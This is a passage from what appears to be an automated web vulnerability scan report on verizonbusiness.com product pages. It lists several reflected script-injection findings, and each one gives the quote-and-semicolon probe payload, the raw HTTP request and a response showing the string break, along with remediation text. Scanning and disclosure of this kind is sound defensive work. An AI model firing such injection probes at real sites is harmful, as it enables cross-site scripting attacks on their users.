Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:30 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/fixed-wirelessf5eb0";9c25d9dc05/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.170. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/fixed-wireless/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47e22'%3bb496a9d0390 was submitted in the REST URL parameter 3. This input was echoed as 47e22';b496a9d0390 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/fixed-wireless47e22'%3bb496a9d0390/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:45 GMT
Content-Type: text/html
Content-Length: 43682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/fixed-wireless47e22';b496a9d0390/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.171. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/global-communications/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c2dd'%3b444cfe9fd01 was submitted in the REST URL parameter 1. This input was echoed as 5c2dd';444cfe9fd01 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products5c2dd'%3b444cfe9fd01/mobility/global-communications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:33 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products5c2dd';444cfe9fd01/mobility/global-communications/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.172. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/global-communications/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85110"%3bb3fb83dad0d was submitted in the REST URL parameter 1. This input was echoed as 85110";b3fb83dad0d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products85110"%3bb3fb83dad0d/mobility/global-communications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:04 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products85110";b3fb83dad0d/mobility/global-communications/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION
...[SNIP]...

1.173. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/global-communications/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f337a"%3b109b4371e9f was submitted in the REST URL parameter 2. This input was echoed as f337a";109b4371e9f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobilityf337a"%3b109b4371e9f/global-communications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42343
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobilityf337a";109b4371e9f/global-communications/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM E
...[SNIP]...

1.174. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/global-communications/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f668'%3bc3fa1a3bdcd was submitted in the REST URL parameter 2. This input was echoed as 2f668';c3fa1a3bdcd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility2f668'%3bc3fa1a3bdcd/global-communications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42343
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility2f668';c3fa1a3bdcd/global-communications/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.175. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/global-communications/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1503b'%3bce953d2f130 was submitted in the REST URL parameter 3. This input was echoed as 1503b';ce953d2f130 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/global-communications1503b'%3bce953d2f130/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:43 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43696
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/global-communications1503b';ce953d2f130/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.176. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/global-communications/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25303"%3bf2cba4c9262 was submitted in the REST URL parameter 3. This input was echoed as 25303";f2cba4c9262 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/global-communications25303"%3bf2cba4c9262/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:49:35 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43694
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/global-communications25303";f2cba4c9262/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.177. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b572'%3b62c53b75e6d was submitted in the REST URL parameter 1. This input was echoed as 3b572';62c53b75e6d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products3b572'%3b62c53b75e6d/mobility/management/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:46:31 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products3b572';62c53b75e6d/mobility/management/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.178. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f1c"%3b5469826756 was submitted in the REST URL parameter 1. This input was echoed as 12f1c";5469826756 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products12f1c"%3b5469826756/mobility/management/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:46:25 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products12f1c";5469826756/mobility/management/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.179. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 646aa"%3bb00394d755e was submitted in the REST URL parameter 2. This input was echoed as 646aa";b00394d755e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility646aa"%3bb00394d755e/management/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:36 GMT
Content-Type: text/html
Content-Length: 42323
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility646aa";b00394d755e/management/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.180. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4bd7'%3b40c09fabac was submitted in the REST URL parameter 2. This input was echoed as d4bd7';40c09fabac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobilityd4bd7'%3b40c09fabac/management/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobilityd4bd7';40c09fabac/management/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.181. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 761a7'%3b4f4249f797b was submitted in the REST URL parameter 3. This input was echoed as 761a7';4f4249f797b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/management761a7'%3b4f4249f797b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:39 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/management761a7';4f4249f797b/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.182. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb55b"%3bb85670a5f74 was submitted in the REST URL parameter 3. This input was echoed as eb55b";b85670a5f74 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/managementeb55b"%3bb85670a5f74/ HTTP/1.1
Host: www.verizonbusiness.com
